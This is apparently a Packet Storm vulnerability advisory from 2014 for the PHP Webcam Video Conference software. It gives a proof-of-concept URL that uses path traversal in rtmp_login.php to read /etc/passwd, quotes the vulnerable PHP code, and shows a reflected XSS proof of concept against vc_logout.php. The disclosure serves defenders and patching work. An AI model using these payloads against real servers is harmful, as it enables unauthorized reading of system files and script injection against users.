PHP Webcam Video Conference Local File Inclusion / XSS

2014-02-06T00:00:00
ID PACKETSTORM:125088
Type packetstorm
Reporter vinicius777
Modified 2014-02-06T00:00:00

Description

                                        
                                            `# Exploit: PHP Webcam Video Conference - LFI/XSS  
# Date: 06/02/2014  
# Exploit Author: vinicius777  
# Contact: vinicius777 [AT] gmail / @vinicius777_  
# Vendor Homepage: http://www.videowhisper.com/  
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference  
# Solution: Upgrade from to the new version on videowhisper vendor homepage.  
  
  
  
  
[1] Local File Include - rtmp_login.php  
  
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd  
  
[+] rtmp_rlogin.php  
  
$session = $_GET['s'];  
  
$filename1 = "uploads/_sessions/$session";  
if (file_exists($filename1))  
{  
echo implode('', file($filename1));  
}  
else  
{  
echo "VideoWhisper=1&login=0";  
}  
?>  
  
  
[2] XSS Reflected  
  
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]  
  
`